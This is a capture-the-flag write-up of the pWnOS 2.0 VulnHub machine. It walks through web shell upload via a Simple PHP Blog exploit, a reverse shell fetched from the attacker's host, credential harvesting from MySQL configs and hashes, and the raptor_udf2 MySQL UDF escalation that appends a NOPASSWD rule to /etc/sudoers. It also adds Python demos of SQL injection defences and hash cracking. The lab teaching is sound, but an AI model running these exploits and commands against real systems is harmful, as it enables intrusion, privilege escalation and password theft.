pWnOS 2.0 (Pre-Release)

A VulnHub virtual machine and OSCP prep box: a classic boot-to-root in which enumeration leads to a blog application with a serious vulnerability that gives the foothold. Privilege escalation was tricky; in the end the simplest solution is the hardest to see, so a secondary priv-esc route is included as well.


Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an "ethical hacker" standpoint. Only perform testing on systems you OWN and/or have express written permission for. Use the information at your own risk.

By continued reading, you acknowledge the aforementioned user risk/responsibilities.


Vulnhub Link: https://www.vulnhub.com/entry/pwnos-20-pre-release,34/
File: pWnOS_v2.0.7z (Size: 286 MB) - Filetype: .vmdk (virtual hard drive)

Setup Note: make sure the VM sits on the 10.10.10.0/24 network; the box answers at 10.10.10.100, so the attacking machine needs an address on that subnet too.

Discover the VM on the network, then ping it to confirm connectivity:

netdiscover -r 10.10.10.0/24

Target: 10.10.10.100, and the ping confirms we have connectivity.

Enumeration

Nmap Scan:

nmap -sV -sC -oA nmap/pwnos 10.10.10.100

We are looking at an SSH server and an HTTP server.

Options:
- Try to kick in the front door over SSH: unlikely to work.
- Navigate to the web server and investigate a way in.

Navigate to web-server:

source:

The source shows a login page and a register page, and reveals a possible user: [email protected]

Login page:

Attempt SQLi on the login form, entering the email with the payload ' or 3=3 --

No-go for injection. A quote-based payload like this only works when the application splices the raw input into its query; since it fails, the login code is escaping the input or binding it as a parameter.
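To see exactly why that payload depends on how the query is built, here is an added example (my code, not from the writeup and not from Simple PHP Blog) using an in-memory SQLite table constructed for the demo. vulnerable_login assembles the query with string formatting; escaped_login and safe_login show the two defences that would produce the same "no-go": doubling the quote, and binding parameters. The trailing space after -- is an assumption for MySQL compatibility, where -- only starts a comment when followed by whitespace.

```python
import sqlite3

# Constructed sample data for the demo: one account, password stored in the
# clear purely to keep the example short (a real app must hash passwords).
SAMPLE_USERS = [("user@example.com", "s3cret")]

# The payload from the writeup. The trailing space is an assumption for MySQL,
# where "--" only starts a comment when followed by whitespace; SQLite does not care.
PAYLOAD = "' or 3=3 -- "


def make_db():
    """Create an in-memory users table populated with the sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_login(conn, email, password):
    """Query assembled by string formatting: attacker input becomes SQL."""
    query = (
        f"SELECT COUNT(*) FROM users WHERE email = '{email}' "
        f"AND password = '{password}'"
    )
    return conn.execute(query).fetchone()[0] > 0


def escaped_login(conn, email, password):
    """Same string building, but single quotes are doubled first.

    This is what escaping helpers do: it blocks the quote-based payload, but
    stays fragile (numeric fields, charset tricks, a forgotten call site).
    """
    email = email.replace("'", "''")
    password = password.replace("'", "''")
    query = (
        f"SELECT COUNT(*) FROM users WHERE email = '{email}' "
        f"AND password = '{password}'"
    )
    return conn.execute(query).fetchone()[0] > 0


def safe_login(conn, email, password):
    """Parameterised query: the driver binds input as data, never as SQL."""
    row = conn.execute(
        "SELECT COUNT(*) FROM users WHERE email = ? AND password = ?",
        (email, password),
    ).fetchone()
    return row[0] > 0


def demo():
    """Run the payload against all three variants; returns the outcomes."""
    conn = make_db()
    return {
        "vulnerable": vulnerable_login(conn, PAYLOAD, "x"),
        "escaped": escaped_login(conn, PAYLOAD, "x"),
        "parameterised": safe_login(conn, PAYLOAD, "x"),
        "valid_creds": safe_login(conn, "user@example.com", "s3cret"),
    }


if __name__ == "__main__":
    for name, succeeded in demo().items():
        print(f"{name:14s} login succeeded: {succeeded}")
```

Only the string-built query lets the payload through: the quote closes the email literal, `or 3=3` makes the WHERE clause true for every row, and the comment swallows the password check. Both defences keep the quote inside the literal, which is the behaviour the login form above exhibits.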

Register New User: create a user: [email protected] / password

It looks like the account has to be activated first.

Navigating to: http://10.10.10.100/activate.php?x=exec%40email.com&y=ab822cb907de2268500066b49acb17b4

Activated. Now let's log in and look for a way into the box.

Login:

It seems to hang at this point…

Source:

The source confirms it did not hang; we just landed on a very uninteresting page.

DirBuster: we need to find more directories.

It turns up /blog.

Navigate to /blog

source:

The web application identifies itself as Simple PHP Blog 0.4.0.

Searching for vulnerabilities:

searchsploit simple php blog

Both exploits jump off the page. Mirror them locally with the -m flag.

Checking out 1191.pl, the syntax we should try, which should return the password file (hash), is:

perl 1191.pl -h http://10.10.10.100/blog -e 2

result:

It successfully gave us the password hash. Let's see what else this exploit can do.

RCE

Upload cmd.php:

perl 1191.pl -h http://10.10.10.100/blog -e 1

We now have a working cmd.php on the web server. Note it for cleanup: a web shell left in a world-readable image directory is as useful to the next visitor as it is to you.

Quick test:

http://10.10.10.100/blog/images/cmd.php?cmd=whoami

We get a response of www-data. Excellent.

Reverse the shell:

Set up a listener with Metasploit.

Use cmd.php to tell the web server to fetch the reverse shell .php file from the attacking machine.

Successful download. Now request the file so the server connects back to the listener.

Connection established.

Upgrade the shell:

python -c 'import pty; pty.spawn("/bin/bash")'

Upgraded. This gives a proper bash prompt and job control inside the shell; for a fully interactive TTY (tab completion, and a Ctrl-C that does not kill the connection) background the shell, put the attacker's terminal into raw mode with echo off, then foreground it again.

Now let's move on to privilege escalation.

Priv-Esc

First we need to enumerate the box a bit with some scripts.

uname -a

Pull the scripts onto the box with wget.

They land in /dev/shm, a tmpfs that everyone can write to and that leaves nothing on disk.

Set their permissions to 700 (chmod 700).

Run the scripts.

The scripts turn up a few candidate priv-esc exploits:

[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...

    Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!

    The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
    - 2.6 UDEV < 141 Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8572 || Language=c
    - 2.6 UDEV Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8478 || Language=c
    - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c

Investigate the www folder: it contains a mysqli_connect.php with database credentials.

Navigating /var, there is another mysqli_connect.php. Check both; when a config include is kept outside the web root, that copy is usually the live one.

Connect to the MySQL server:

mysql -u root -p

Check for passwords:

Found hashes to crack.
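Hashes pulled from a database are worth checking offline against a short candidate list before reaching for a full cracker. Below is an added example (my code, not from the writeup) that guesses the unsalted format from the hash's shape (32 hex = MD5, 40 hex = SHA-1, '*' followed by 40 hex = MySQL 4.1+ native PASSWORD(), which is '*' plus SHA1(SHA1(password)) in uppercase hex) and tries each word plus the cheap mutations people use, the same "variants" idea applied to root's password in the Root section below. The sample hashes are constructed for the demo; the writeup does not state which tables or hash formats the box actually holds.

```python
import hashlib

HEX = set("0123456789abcdefABCDEF")


def mysql_native_hash(password: str) -> str:
    """MySQL 4.1+ PASSWORD(): '*' + SHA1(SHA1(password)) as uppercase hex."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def identify(h: str) -> str:
    """Guess an unsalted hash format from its shape alone (assumption: no salt)."""
    body = h[1:] if h.startswith("*") else h
    if not body or any(c not in HEX for c in body):
        return "unknown"
    if h.startswith("*") and len(body) == 40:
        return "mysql-native"
    if len(h) == 32:
        return "md5"
    if len(h) == 40:
        return "sha1"
    return "unknown"


def hash_as(kind: str, candidate: str):
    """Hash a candidate password in the given format, or None if unsupported."""
    if kind == "mysql-native":
        return mysql_native_hash(candidate)
    if kind == "md5":
        return hashlib.md5(candidate.encode()).hexdigest()
    if kind == "sha1":
        return hashlib.sha1(candidate.encode()).hexdigest()
    return None


def variants(word: str):
    """The base word plus the cheap mutations people actually use."""
    yield word
    yield word.capitalize()
    for suffix in ("1", "!", "123", "2012"):
        yield word + suffix
        yield word.capitalize() + suffix


def crack(hashes, wordlist):
    """Return {hash: plaintext} for every hash matched by a wordlist variant."""
    found = {}
    for h in hashes:
        kind = identify(h)
        if kind == "unknown":
            continue
        for word in wordlist:
            hit = next((c for c in variants(word)
                        if hash_as(kind, c).lower() == h.lower()), None)
            if hit is not None:
                found[h] = hit
                break
    return found


# Constructed sample hashes for the demo (not values taken from the box).
VARIANT_HASH = hashlib.md5(b"password!").hexdigest()  # a mutated candidate
SAMPLE_HASHES = [
    "*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19",  # MySQL native, "password"
    "5f4dcc3b5aa765d61d8327deb882cf99",           # MD5, "password"
    "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8",   # SHA-1, "password"
    VARIANT_HASH,
    "e10adc3949ba59abbe56e057f20f883e",           # MD5, "123456": not in the list
]
SAMPLE_WORDS = ["password", "letmein", "admin"]

if __name__ == "__main__":
    for h, pw in crack(SAMPLE_HASHES, SAMPLE_WORDS).items():
        print(f"{identify(h):13s} {h}  ->  {pw}")
```

Anything this does not recover goes to hashcat or John with a real wordlist; the point here is that the formats commonly found in a PHP app's users table and in mysql.user are unsalted, so the credentials you just read from mysqli_connect.php are only the start of what the database gives up.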

Secondary Priv-Esc/Root

I wanted to try the udev and MySQL privilege escalations, and going down the udev road I was unsuccessful in escalating. When it came to the MySQL escalation I ran into some slight issues compiling, but was able to create the file locally and then send it to the box. Below you will see my solution via MySQL.

Exploit: - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c

I downloaded it locally and began inspecting the source:

 Usage:
 * $ id
 * uid=500(raptor) gid=500(raptor) groups=500(raptor)
 * $ gcc -g -c raptor_udf2.c
 * $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
 * $ mysql -u root -p
 * Enter password:
 * [...]
 * mysql> use mysql;
 * mysql> create table foo(line blob);
 * mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
 * mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
 * mysql> create function do_system returns integer soname 'raptor_udf2.so';
 * mysql> select * from mysql.func;
 * +-----------+-----+----------------+----------+
 * | name      | ret | dl             | type     |
 * +-----------+-----+----------------+----------+
 * | do_system |   2 | raptor_udf2.so | function |
 * +-----------+-----+----------------+----------+
 * mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
 * mysql> \! sh
 * sh-2.05b$ cat /tmp/out
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
 * [...]
 *
 * E-DB Note: Keep an eye on https://github.com/mysqludf/lib_mysqludf_sys

While attempting to compile raptor_udf2.so, it would not compile on the box, so I compiled it locally and sent it to the box.

Error received:

A common cause of build failures at this step is the soname flag on the linker line: it must be -Wl,-soname (lowercase L), and copies of the usage text frequently show -W1 (digit one). If you do build on the attacking machine instead, match the target's architecture and, for an older target, link against a glibc it can actually load.

After compiling locally and sending it over:

Log in to the MySQL server with the credentials found earlier. Before running the UDF steps, confirm three things: where mysqld looks for shared objects (the plugin_dir system variable; MySQL 5.1 and later load UDFs only from there, so the /usr/lib in the usage text may be the wrong target), that load_file() on your upload returns something other than NULL (it fails silently when the mysqld process cannot read the file or secure_file_priv restricts it), and that the path you give load_file() is where you actually put the .so (the /home/raptor/ in the usage text is the exploit author's home directory). The UDF runs with the privileges of the mysqld process, so this route only yields root when mysqld runs as root, which it does here, as the later write to /etc/sudoers shows.

show tables;
create table foo(line blob);
insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/raptor_udf2.so';

I received an error that raptor_udf2.so did not exist at /usr/lib/raptor_udf2.so, so at this point I manually pushed the file to the directory.

Then, in the mysql client, after the create function step from the usage text:

select do_system('echo "www-data ALL =(ALL) NOPASSWD: ALL" >> /etc/sudoers');

We have successfully added www-data to /etc/sudoers, so a plain sudo bash gives a root shell. Be careful with that line: sudo parses the whole file and refuses to run at all if any entry is malformed, which would lock sudo for everyone on the box, so get the syntax exactly right before appending it.

Root

Password reuse is always a possibility, so try SSH as root with the recovered passwords.

Trying both variants of the password is always worth a shot.

Bring me the root!

-exec